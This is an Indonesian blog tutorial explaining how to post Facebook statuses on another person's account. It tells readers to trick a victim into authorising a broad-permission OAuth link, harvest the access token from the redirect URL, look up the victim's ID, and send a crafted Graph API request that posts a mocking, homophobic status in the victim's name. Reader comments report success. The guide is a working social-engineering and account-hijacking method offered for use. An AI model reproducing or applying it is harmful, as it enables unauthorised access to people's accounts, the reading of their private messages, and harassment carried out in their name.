Pernak Pernik Camfrog Kuliner makanan asia


Contact Us
Camfrog nick: J_E (IM) (Add)
PIN BBM : 7427270C
WhatsApp : 085 702 005 400
Email : admin@downloadgratis34.com
My Room Camfrog : IAA

Hack Status Facebook Orang - Hack FB Update Status

.
Share N Like on :

Artikel Terkait, Wajib Dibaca

Ditulis oleh zatyabajaitem Hack Status Facebook Orang - Hack FB Update Status Tentang cara hack status fb orang, hack update status facebook orang, cara hack status facebook pacar, downloadgratis34.com cara mengetahui status fb si pacar, cara usil kerjai status fb teman, ngehack status fb teman, hack fb status pacar, cara hack status facebook orang di warnet, hack status fb orang lewat komputer, cara mudah hack update status fb orang. Penasaran?? cekidot gan


rating 5



Cara berikut ini sangat mudah, dan berikut syarat untuk melakukannya:

1. Ambil segelas teh manis hangat, pejamkan mata, dan sruput sedikit.. biar hati nyaman.
2. Baca doa, biar hati ikhlas untuk melakukan cara ini.
3. Baca2 buku trick dalam hal speak / biar jago bacot dalam hal ini (serius).


Disini Zatyabajaitem downloadgratis34.com akan menjelaskan secara detail, harap teliti gan, baca dulu, jangan malas membaca !!

OK langsung ke caranya, saatnya serius:

1. Yang pertama harus tau "token" facebook. Apa itu token? Contoh: bayangkan kalian memiliki Akun bank B CA, dan ingin transaksi online (iBanking), nah kalian kan mesti harus punya alat token, jadi fungsinya untuk akses data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun bank) atau proses lainnya yang membutuhkan otorisasi.

Tapi token facebook berbeda. Nah, bagaimana cara mendapatkan Token Facebook tersebut??

Caranya mudah, kasih link ini ke korban target kamu, berikut link nya:

https://m.facebook.com/dialog/permissions.request?app_id=72687635881&display=wap&next=http://www.facebook.com/connect/login_success.html&response_type=token&perms=user_about_me,user_activities,user_birthday,user_checkins,user_education_history,user_events,user_groups,user_hometown,user_interests,user_likes,user_location,user_notes,user_photos,user_questions,user_relationships,user_relationship_details,user_religion_politics,user_status,user_subscriptions,user_videos,user_website,user_work_history,email,friends_about_me,friends_activities,friends_birthday,friends_checkins,friends_education_history,friends_events,friends_groups,friends_hometown,friends_interests,friends_likes,friends_location,friends_notes,friends_photos,friends_questions,friends_relationships,friends_relationship_details,friends_religion_politics,friends_status,friends_subscriptions,friends_videos,friends_website,friends_work_history,read_friendlists,read_insights,read_mailbox,read_requests,read_stream,xmpp_login,create_event,manage_friendlists,manage_notifications,user_online_presence,friends_online_presence,publish_checkins,publish_stream,rsvp_event,publish_actions

atau link ini :
http://bit.ly/PpkuJH


Dan sarankan si korban untuk membuka link diatas tersebut di browser si dia, dan suruh untuk install.
Entah bagaimana agan caranya melobby dia agar mau, yang penting dia mau klik. hahaha
(Biasanya antara pintar dan bodoh emang tipis gan perbedaannya untuk mengakali dan diakali :p ).

Jika link di atas di copy paste pada browser (contoh:mozilla/opera/chrome) , dan di enter, maka tampilannya akan seperti dibawah ini:


klik install pada sisi kanan atas




Kemudian akan muncul beberapa pilihan kotak kolom centang, dan Jangan dicentang semua, selanjutnya klik Allow None pada kanan bawah.


Setelah langkah diatas, tunggu beberapa saat, dan akan muncul kata success.

Perhatikan browser kamu dan Copy link url browser kamu tersebut:

contoh link yang didapat Zatyabajaitem dibawah:

https://www.facebook.com/connect/login_success.html#access_token=AAAAAEOyFTakBANN0myAOIVpn2vzIcuAWeNDAlqfUjKgZCFMTp48k4SZB2ciHLvJuciYm4KXdRTJRiz3FHnhy6RLFhXSPShc5wC691ffLeE48s5l8MyA&expires_in=4068

Perhatikan link diatas, diatas terdapat token fb si target. Berikut token si target:

https://www.facebook.com/connect/login_success.html#access_token=AAAAAEOyFTakBANN0myAOIVpn2vzIcuVEXFZAlqfUjKgZCFMTp48k4SZB2ciHLvJuciYm4KCYTEdRiz3FHnhy6RLFhXSPShSwAZC691ffLeE48s5l8MyA&expires_in=4068

Jadi tokennya adalah:

AAAAAEOyFTakBANN0myAOIVpn2vzIcuVEXFZAlqfUjKgZCFMTp48k4SZB2ciHLvJuciYm4KCYTEdRiz3FHnhy6RLFhXSPShSwAZC691ffLeE48s5l8MyA

OK, sampai step ini diharap agan sudah Mengerti Maksud ane. Dan diharap jangan bingung, kalo bingung pegangan toket.. eh token nya maksudnya.




WOKE, lanjut ke STEP selanjutnya. Step selanjutnya adalah mencari ID Facebook si korban.(Melakukannya pada browser kita, bukan browser si korban)

Caranya buka: http://graph.facebook.com/NamaSikorban

contohnya: NamaSiKorban yang dimaksud adalah username si korban, kamu buka profile dia, dan liat link url profile dia, https://www.facebook.com/KopetGaring
Nah, jadi masukan NamaSiKorban dengan KopetGaring.
jadinya begini:

http://graph.facebook.com/KopetGaring

Masukan link tersebut diatas ke browser kita (bukan browser si korban),dan enter. Maka akan didapat id nya:

{
"id": "1105319641",
"name": "Kopet Garing",
"first_name": "Kopet",
"last_name": "Garing",
"link": "https://www.facebook.com/KopetGaring",
"username": "Kopet.Garing",
"gender": "male",
"locale": "id_ID"
}

Nah, jadi ID nya adalah 1105319641 :D

OK, sampai step ini, kita sudah punya Token dan ID si korban.




Langkah selanjutnya adalah ke intinya: HACK UPDATE STATUS SI KORBAN ..kikikikikik

Silahkan copy link dibawah ini di browser kamu:

https://graph.facebook.com/IDsiKorban/feed?method=POST&message=Pesan Status Facebook yang ingin dikerjai &access_token=Tokennya

Masukkan dan ganti huruf yang zatyabajaitem tebalkan diatas dengan data sikorban yang kamu dapat.

Contoh memasukkannya :

https://graph.facebook.com/1105319641/feed?method=POST&message=Hari ini gw kencan sama MAHO,rasanya makyus berooo, ada yang mau coba.. &access_token=AAAAAEOyFTakBANN0myAOIVpn2vzIcuVEXFZAlqfUjKgZCFMTp48k4SZB2ciHLvJuciYm4KCYTEdRiz3FHnhy6RLFhXSPShSwAZC691ffLeE48s5l8MyA

Dan klik enter, maka otomatis di status si korban akan muncul status yang kamu buat barusan. kwkkwwkwkwkw

Tanda jika kamu berhasil adalah, begitu kamu klik link diatas maka akan muncul kode seperti dibawah di browser kamu:

{
"id": "1105319641_3982368245941"
}



NB:
1. Token si korban biasanya cuma bertahan 1 hari, atau bahkan beberapa jam saja. Jika bisa lama, ya alhamdulilah kalo gt..hhh
2. Jangan tertawa keras2 gan, tapi gapapa deh sebelum ketawa dilarang.

Dan kali ini, Zatyabajaitem downloadgratis34.com harus bilang...


Riri Hermawan -

Klik di atas untuk download

Masukkan email kamu di kolom bawah ini untuk berlangganan artikel, dan akan dikirim email secara otomatis setiap web ini update artikel, GRATIS:

Lalu buka inbox email kamu untuk confirm gan


Software, Tips Trik Lainnya, WAJIB BACA



Untuk Berkomentar N'Chat KLIK ==> Add Comment
Untuk menggunakan emoticon ini, gunakan kodenya di kotak komentar.Contoh :e:
:a: :b: :c: :d: :e: :f: :g: :h: :i:
:j: :k: :l: :m: :n: :o: :p: :q: :r:
:s: :t: :u: :v: :w: :x: :y: :z: :cf:

15 comments:

  1. waduh kok rumit gini y :d:

    ReplyDelete
  2. .y. mantap gan...salut buat bazahitam

    om bisa jadi murid gak nih ane, kalo bisa add ym ane yah i'd tooookeeee thx master :s:

    ReplyDelete
  3. hahha.....berhasiL...
    mantab gan!!!

    ReplyDelete
  4. keren sih tapi gimana dapetin tokennya,,,,, kan yang buka si korban bukan kita jadi ga tau tuh token nya

    ReplyDelete
  5. wa ka ka ka :v:

    ReplyDelete
  6. brasil tpi susah untuk dptin token korban

    ReplyDelete

 
Copyright 2014 . All Right Reserved | Sitemap | About Us | Privacy Policy |